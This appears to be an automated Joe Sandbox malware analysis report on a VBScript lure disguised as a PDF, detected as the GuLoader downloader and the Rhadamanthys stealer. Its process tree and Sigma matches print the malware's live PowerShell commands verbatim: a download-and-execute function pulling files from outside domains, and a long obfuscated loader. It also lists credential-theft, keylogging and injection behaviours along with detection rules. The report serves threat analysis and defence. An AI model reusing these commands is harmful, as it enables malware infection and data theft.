Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
List of required items and services pdf.vbs

Overview

General Information

Sample name:List of required items and services pdf.vbs
Analysis ID:1571840
MD5:32aabce75f3fd75d0ecf7743bc6b9aff
SHA1:0f715b1ceafeddd4c80b294e91ec476ae3e8c0d0
SHA256:21beb442551b46efbb7727a20784e6f047b4321dd3d8ccfca94c256b9ad6e0be
Tags:185-236-228-92vbsuser-JAMESWT_MHT
Infos:

Detection

GuLoader, RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to detect virtual machines (STR)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Dllhost Internet Connection
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7492 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7760 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\udkz59n9.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • WMIC.exe (PID: 7820 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelButK ePhsCr1M 9 T1') ;Allestedsnrvrende $Linievogternes;Allestedsnrvrende (ectethmoid 'SesLiT,eAForC.TPl-SgSEllSaE,ve nPEm I 4');Allestedsnrvrende (ectethmoid 'Ko$ ,GellBaoAvBJoaFrl p:S cUdI VBlI llnobR EUdSknk By otTrtSteLaLThSToE s G=Tr(M.T TETesCotUn-,lpFuaFatToh i Re$O.bPeEB.g YMen DDBoeS LN SG.EC s LVii on ojI ESkRliN .e B1As0F.9Ar)') ;Allestedsnrvrende (ectethmoid ' M$JeG RLU.oSybBiA .LTi: JrAlE GKoI.lsAftnirSuEScrB.iHinHoGOpSUnNS UEnMA MAreSpr.us F=En$M,G iLNooLgb nA.alM.:J KFlNNeu aB .SLiE.o+Ru+ r%Un$ NSP VFoiUnNMee SUn. CCaoG Ud NInt') ;$agreed=$Svines[$Registreringsnummers]}$Djvelskabers=282895;$Unpreparedness=28214;Allestedsnrvrende (ectethmoid 'H $ChGafL OH,bRaa ,l.e:BoSHeH ,yDylOpOBoC ek TeS d I sa=K igEkE BtH - FCDooRenInt FeIln HtCr Ti$FiB Nep,gU yE NTaDB E Il BSIneM,SLel LiMinI j.aeA.RFrNAne,u1.g0Ge9');Allestedsnrvrende (ectethmoid 'Pr$ g Dl,oo BbNaaPslRe:poD AdSvnS iCan,ygtje ,n W ,d=Un k[AfSIsy .sInt EeM mSk. SCBao an LvB eTyrmotE ]Ma:Bo: MF Fr ,oPhm BA asesHuePr6Ma4KrSKotCrr .i.unA.gS.(Co$,aSS hhyyG lMoosycRek ee adOv)');Allestedsnrvrende (ectethmoid 'Pa$Hjg BlD,o FB,nALalOc: ,kDka.inBut HsC.TPoeO n eLonEfS i Bo= I M,[FossaYFeSUnt EUnMCo.KaT.ee .xChTG .,deGrNReCBoOPrd .iR ND G ] F:.a: HaReS.ac EIchIGr.l gTleStt s Ct eRVeiF n fg.a(Fo$HiDFrdAlnAnI,eNcrgpoEDinhy)');Allestedsnrvrende (ectethmoid 'Ca$,ogbol eOMoBXaA CLMa:m tmaI ,lErSBrKStA dAiEA,KP O UmDaNEpeMo=F $EgKSeaHjN nT S eT PeRon Be,lnWasth. iS eUU BS sAltCorR iStn MGS (Fo$PedInjDav E ClM sSekEmaU.B GeFlRDiSBu,Sa$Beu NnUnpB,rGae,np EA Fr.eE iDErNEne .sM Ssn)');Allestedsnrvrende $Tilskadekomne;" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • EXCEL.EXE (PID: 3444 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\lsm5k8gou5bjv.xlsx" MD5: 4A871771235598812032C822E6F68F19)
        • splwow64.exe (PID: 3900 cmdline: C:\Windows\splwow64.exe 8192 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • powershell.exe (PID: 7260 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelButK ePhsCr1M 9 T1') ;Allestedsnrvrende $Linievogternes;Allestedsnrvrende (ectethmoid 'SesLiT,eAForC.TPl-SgSEllSaE,ve nPEm I 4');Allestedsnrvrende (ectethmoid 'Ko$ ,GellBaoAvBJoaFrl p:S cUdI VBlI llnobR EUdSknk By otTrtSteLaLThSToE s G=Tr(M.T TETesCotUn-,lpFuaFatToh i Re$O.bPeEB.g YMen DDBoeS LN SG.EC s LVii on ojI ESkRliN .e B1As0F.9Ar)') ;Allestedsnrvrende (ectethmoid ' M$JeG RLU.oSybBiA .LTi: JrAlE GKoI.lsAftnirSuEScrB.iHinHoGOpSUnNS UEnMA MAreSpr.us F=En$M,G iLNooLgb nA.alM.:J KFlNNeu aB .SLiE.o+Ru+ r%Un$ NSP VFoiUnNMee SUn. CCaoG Ud NInt') ;$agreed=$Svines[$Registreringsnummers]}$Djvelskabers=282895;$Unpreparedness=28214;Allestedsnrvrende (ectethmoid 'H $ChGafL OH,bRaa ,l.e:BoSHeH ,yDylOpOBoC ek TeS d I sa=K igEkE BtH - FCDooRenInt FeIln HtCr Ti$FiB Nep,gU yE NTaDB E Il BSIneM,SLel LiMinI j.aeA.RFrNAne,u1.g0Ge9');Allestedsnrvrende (ectethmoid 'Pr$ g Dl,oo BbNaaPslRe:poD AdSvnS iCan,ygtje ,n W ,d=Un k[AfSIsy .sInt EeM mSk. SCBao an LvB eTyrmotE ]Ma:Bo: MF Fr ,oPhm BA asesHuePr6Ma4KrSKotCrr .i.unA.gS.(Co$,aSS hhyyG lMoosycRek ee adOv)');Allestedsnrvrende (ectethmoid 'Pa$Hjg BlD,o FB,nALalOc: ,kDka.inBut HsC.TPoeO n eLonEfS i Bo= I M,[FossaYFeSUnt EUnMCo.KaT.ee .xChTG .,deGrNReCBoOPrd .iR ND G ] F:.a: HaReS.ac EIchIGr.l gTleStt s Ct eRVeiF n fg.a(Fo$HiDFrdAlnAnI,eNcrgpoEDinhy)');Allestedsnrvrende (ectethmoid 'Ca$,ogbol eOMoBXaA CLMa:m tmaI ,lErSBrKStA dAiEA,KP O UmDaNEpeMo=F $EgKSeaHjN nT S eT PeRon Be,lnWasth. iS eUU BS sAltCorR iStn MGS (Fo$PedInjDav E ClM sSekEmaU.B GeFlRDiSBu,Sa$Beu NnUnpB,rGae,np EA Fr.eE iDErNEne .sM Ssn)');Allestedsnrvrende $Tilskadekomne;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5316 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • svchost.exe (PID: 4820 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • svchost.exe (PID: 5900 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • chrome.exe (PID: 4544 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr8548.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a9b905ba/4a1b3c1a" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 7952 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2044,i,7050312462197299471,10248190521598653203,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • wmpshare.exe (PID: 6016 cmdline: "C:\Program Files\Windows Media Player\wmpshare.exe" MD5: A89F75B51EAADA8C97F8D674B3EDB2F2)
            • dllhost.exe (PID: 2336 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • svchost.exe (PID: 7296 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000003.2268669701.0000000005A80000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000011.00000003.2268437168.0000000005860000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000011.00000003.2266293823.00000000033E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        00000009.00000002.2125078968.0000000008140000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000010.00000003.2268036738.0000000020B60000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            17.3.svchost.exe.5a80000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              17.3.svchost.exe.5860000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                17.3.svchost.exe.5860000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  16.3.msiexec.exe.21380000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    17.3.svchost.exe.5a80000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 2 entries

                      Other

                      SourceRuleDescriptionAuthorStrings
                      amsi64_7924.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                        amsi32_7260.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                        • 0xa220:$b2: ::FromBase64String(
                        • 0x92b3:$s1: -join
                        • 0x2a5f:$s4: +=
                        • 0x2b21:$s4: +=
                        • 0x6d48:$s4: +=
                        • 0x8e65:$s4: +=
                        • 0x914f:$s4: +=
                        • 0x9295:$s4: +=
                        • 0x12a3e:$s4: +=
                        • 0x12abe:$s4: +=
                        • 0x12b84:$s4: +=
                        • 0x12c04:$s4: +=
                        • 0x12dda:$s4: +=
                        • 0x12e5e:$s4: +=
                        • 0x9abd:$e4: Get-WmiObject
                        • 0x9cac:$e4: Get-Process
                        • 0x9d04:$e4: Start-Process
                        • 0x136a4:$e4: Get-Process

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Potentially Suspicious PowerShell Child Processes
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\udkz59n9.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\udkz59n9.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7540, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\udkz59n9.vbs" , ProcessId: 7760, ProcessName: wscript.exe
                        Sigma detected: Script Interpreter Execution From Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\udkz59n9.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\udkz59n9.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7540, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\udkz59n9.vbs" , ProcessId: 7760, ProcessName: wscript.exe
                        Sigma detected: Suspicious Invoke-WebRequest Execution
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services pdf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7492, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx', ProcessId: 7540, ProcessName: powershell.exe
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services pdf.vbs", ProcessId: 7492, ProcessName: wscript.exe
                        Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
                        Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7540, TargetFilename: C:\Users\Public\udkz59n9.vbs
                        Sigma detected: Dllhost Internet Connection
                        Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 45.149.241.141, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 2336, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49870
                        Sigma detected: Msiexec Initiated Connection
